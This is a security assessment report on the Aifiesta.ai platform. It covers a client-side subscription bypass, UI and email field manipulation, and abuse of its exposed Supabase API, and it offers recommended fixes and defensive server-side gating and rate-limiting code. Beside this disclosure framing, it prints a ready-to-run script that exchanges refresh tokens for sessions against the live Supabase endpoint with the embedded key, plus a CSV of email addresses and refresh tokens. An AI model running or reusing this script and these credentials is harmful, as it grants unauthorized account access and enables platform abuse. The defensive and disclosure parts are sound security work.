Educational security research report covering client-side bypass, exposed API infrastructure, and proof-of-concept artifacts.
IMPORTANT LEGAL NOTICE:
This security assessment was conducted for educational and security research purposes only. The intention is to demonstrate potential security vulnerabilities with live proof-of-concept to help improve the platform's security posture.
- ❌ NOT intended to harm the business or its operations
- ❌ NOT intended for malicious exploitation
- ✅ Conducted to identify and responsibly disclose security issues
- ✅ All testing performed on publicly accessible endpoints
This report documents observed security weaknesses in Aifiesta.ai from a proof-of-concept security assessment. The assessment demonstrates that some subscription and account-access controls can be influenced from the client side, and that frontend-exposed Supabase API infrastructure may enable automated abuse scenarios if not protected by server-side validation, rate limiting, and abuse controls.
| Report Item | Detail |
|---|---|
| Target | Aifiesta.ai |
| Assessment Type | Educational security research / proof-of-concept |
| Primary Artifacts | Chrome extension proof of concept, account access proof of concept |
| Core Risk Area | Client-side trust, exposed API infrastructure, automated account abuse |
| Intended Outcome | Responsible disclosure and improved platform security posture |
| Area | Included Evidence |
|---|---|
| Chrome extension PoC | Installation flow and demonstrated UI/client-side bypass behavior |
| Frontend validation | Client-side subscription bypass and UI state manipulation |
| Account access testing | Refresh-token based proof-of-concept flow for security testing only |
| Abuse-risk analysis | Automated account creation, OTP bombing, spam, and resource abuse |
| Public endpoints | Testing performed on publicly accessible endpoints |
| ID | Finding | Risk Theme | Status |
|---|---|---|---|
| AF-001 | Client-side subscription bypass | Authorization control | Demonstrated |
| AF-002 | Email field manipulation | Privacy concern | Demonstrated |
| AF-003 | UI state manipulation | Client-side trust | Demonstrated |
| AF-004 | Exposed Supabase API infrastructure | Platform abuse | Demonstrated |
Installation: chrome://extensions/ → Developer Mode → Load unpacked
- Client-side subscription bypass (frontend validation only)
- Email field manipulation (privacy concern demonstration)
- UI state manipulation (visual bypass proof)
| Field | Detail |
|---|---|
| Category | Authorization / client-side validation |
| Observation | Subscription-related state can be influenced from the frontend |
| Original Evidence | Client-side subscription bypass (frontend validation only) |
| Business Impact | Users may visually or functionally bypass subscription gates |
| Recommended Fix | Enforce subscription checks server-side for every gated action |
| Field | Detail |
|---|---|
| Category | Privacy / data integrity |
| Observation | Email-related field manipulation was demonstrated |
| Original Evidence | Email field manipulation (privacy concern demonstration) |
| Business Impact | User identity display or account metadata may be misused |
| Recommended Fix | Treat frontend fields as untrusted and validate on API |
| Field | Detail |
|---|---|
| Category | Client-side trust |
| Observation | UI state can be manipulated for visual bypass proof |
| Original Evidence | UI state manipulation (visual bypass proof) |
| Business Impact | Users may be misled by UI-only access indicators |
| Recommended Fix | Keep UI state derived from authenticated server data |
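A server-side gate for AF-001 and AF-003, added here as an example and not code from the report or from Aifiesta.ai; it assumes `req.auth.userId` has already been verified from the auth JWT by upstream middleware and uses a constructed subscription table:

```javascript
// Added example (not code from the report or from Aifiesta.ai): server-side
// subscription gating for AF-001 and AF-003. Assumes req.auth.userId was
// already verified from the auth JWT by upstream middleware; the
// subscription table below is constructed.
const subscriptions = new Map([
  ['user-a', { plan: 'pro', expiresAt: Date.parse('2099-01-01T00:00:00Z') }],
  ['user-b', { plan: 'pro', expiresAt: Date.parse('2020-01-01T00:00:00Z') }], // lapsed
]);

// VULNERABLE pattern (AF-001): the server believes a flag the client sent,
// so editing the request body or extension state is enough to get through.
function gateTrustingClient(req) {
  return req.body && req.body.isPremium === true ? 'allow' : 'deny';
}

// HARDENED pattern: the client flag is ignored; entitlement is derived only
// from the authenticated user id and the server-side subscription record.
function gateServerSide(req, store = subscriptions, now = Date.now()) {
  if (!req.auth || !req.auth.userId) return 'deny'; // unauthenticated
  const sub = store.get(req.auth.userId);
  if (!sub) return 'deny';                           // no subscription row
  if (sub.expiresAt <= now) return 'deny';           // lapsed or expired
  if (sub.plan !== 'pro') return 'deny';             // wrong tier
  return 'allow';
}

// AF-003: the UI should render entitlement from this server response, not
// from client-held state.
function entitlementForUi(req) {
  return { premium: gateServerSide(req) === 'allow' };
}

// Constructed requests: a lapsed user claiming premium via the client flag,
// a legitimate subscriber, and an unauthenticated caller.
const forged = { auth: { userId: 'user-b' }, body: { isPremium: true } };
const legit  = { auth: { userId: 'user-a' }, body: {} };
const anon   = { auth: null, body: { isPremium: true } };

function demo() {
  return {
    forgedClientGate: gateTrustingClient(forged), // 'allow': the bypass
    forgedServerGate: gateServerSide(forged),     // 'deny'
    legitServerGate: gateServerSide(legit),       // 'allow'
    anonServerGate: gateServerSide(anon),         // 'deny'
    legitUi: entitlementForUi(legit),             // { premium: true }
  };
}
```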
Finding: The frontend exposes the Supabase project URL and anon API key. Supabase anon keys are designed to be shipped to clients, so the risk is what an unauthenticated client can do with them when server-side validation, rate limiting and abuse controls are absent, namely:
- Automated account creation at scale
- Email service abuse through OTP bombing
- Resource consumption attacks
- Platform spam and abuse
| Field | Detail |
|---|---|
| Category | API exposure / abuse prevention |
| Observation | Frontend-exposed Supabase API credentials can be reused by clients |
| Affected Risk Areas | Account creation, OTP abuse, resource consumption, spam |
| Business Impact | Increased infrastructure cost, degraded user trust, and abuse exposure |
| Recommended Fix | Rotate exposed keys where appropriate and add abuse controls |
For security testing only:

```javascript
// Exchanges a refresh token at the Supabase Auth token endpoint that the
// frontend already calls, then writes the returned session to the
// localStorage key supabase-js reads, so the page picks it up on reload.
async function login1337(token) {
  const res = await fetch('https://ubipcxqbjqyzcisxiugn.supabase.co/auth/v1/token?grant_type=refresh_token', {
    method: 'POST',
    headers: {
      'apikey': 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6InViaXBjeHFianF5emNpc3hpdWduIiwicm9sZSI6ImFub24iLCJpYXQiOjE3NTE1ODAzMzAsImV4cCI6MjA2NzE1NjMzMH0.adJrFDJGZNWQCdQKIiOtMTrxkO3_z7s0-iwO5yOlZGU',
      'Content-Type': 'application/json'
    },
    body: JSON.stringify({
      refresh_token: token
    })
  });
  const data = await res.json();
  if (res.ok) {
    localStorage.setItem("sb-ubipcxqbjqyzcisxiugn-auth-token", JSON.stringify(data));
    console.log("🚀 Logged in successfully");
    return data;
  }
  throw new Error(data.error_description || 'Login failed');
}

login1337("gxmnlks75rgc")
```
```csv
email,refreshToken
jboi86qqseoy@dugmail.com,bpznkxnzyr22
tly8246eqcgd@corhash.net,kl46pu7sh4ea
2kgbdziolefy@dugmail.com,r23kfz2twfvt
```
- Implement server-side subscription validation
- Secure API keys and rotate regularly
- Add rate limiting for account creation
- Implement CAPTCHA for OTP requests
| Priority | Action | Goal |
|---|---|---|
| High | Implement server-side subscription checks | Remove trust from client-side validation |
| High | Add rate limiting for account creation | Reduce automated account abuse |
| High | Implement CAPTCHA for OTP requests | Reduce OTP bombing risk |
| Medium | Secure API keys and rotate regularly | Limit impact of exposed credentials |
| Medium | Monitor auth and OTP request patterns | Detect abuse before it scales |
| Medium | Log and alert on suspicious account activity | Improve response and investigation speed |
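The rate-limiting and monitoring recommendations above, worked through as an added example that is not code from the report or from Aifiesta.ai; the limits, the alert threshold and the request burst are constructed, and the limiter keys on the e-mail address and source IP of each OTP or sign-up request:

```javascript
// Added example (not Aifiesta.ai's code): sliding-window rate limiting for
// OTP and sign-up requests, keyed by email and by source IP, with a simple
// alert once a key keeps hammering after being blocked. Limits and the
// request sample are constructed for illustration.
const LIMITS = {
  email: { max: 3, windowMs: 10 * 60 * 1000 },  // 3 OTPs per address per 10 min
  ip:    { max: 10, windowMs: 10 * 60 * 1000 }, // 10 requests per IP per 10 min
};
const ALERT_AFTER = 20; // rejected attempts on one key before an alert is raised

class OtpRateLimiter {
  constructor() {
    this.hits = new Map();    // key -> timestamps still inside the window
    this.blocked = new Map(); // key -> number of rejected attempts
    this.alerts = [];         // { key, at } entries for monitoring / SOC
  }
  recent(key, windowMs, now) {
    const ts = (this.hits.get(key) || []).filter(t => now - t < windowMs);
    this.hits.set(key, ts);
    return ts;
  }
  // Returns 'allow' or 'block'. Both keys are checked before either is counted,
  // so a blocked request does not consume quota on the other key.
  request({ email, ip }, now = Date.now()) {
    const keys = [[`email:${email.toLowerCase()}`, LIMITS.email], [`ip:${ip}`, LIMITS.ip]];
    const over = keys.filter(([k, l]) => this.recent(k, l.windowMs, now).length >= l.max);
    if (over.length) {
      for (const [k] of over) {
        const n = (this.blocked.get(k) || 0) + 1;
        this.blocked.set(k, n);
        if (n === ALERT_AFTER) this.alerts.push({ key: k, at: now });
      }
      return 'block';
    }
    for (const [k] of keys) this.hits.get(k).push(now);
    return 'allow';
  }
}

// Constructed burst: one address requested `count` times, 2 s apart, from one IP.
function simulateBurst(count = 25) {
  const rl = new OtpRateLimiter();
  const t0 = 1700000000000;
  const results = [];
  for (let i = 0; i < count; i++) {
    results.push(rl.request({ email: 'user@example.com', ip: '203.0.113.7' }, t0 + i * 2000));
  }
  return { allowed: results.filter(r => r === 'allow').length,
           blocked: results.filter(r => r === 'block').length, alerts: rl.alerts.length };
}
```

With the constructed burst of 25 requests, 3 are allowed, 22 are blocked and one alert fires on the e-mail key; the IP key never trips because only allowed requests count against it.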
This report is intended to support responsible disclosure. The findings and proof-of-concept material should be shared only with authorized stakeholders and used to improve Aifiesta.ai's security posture.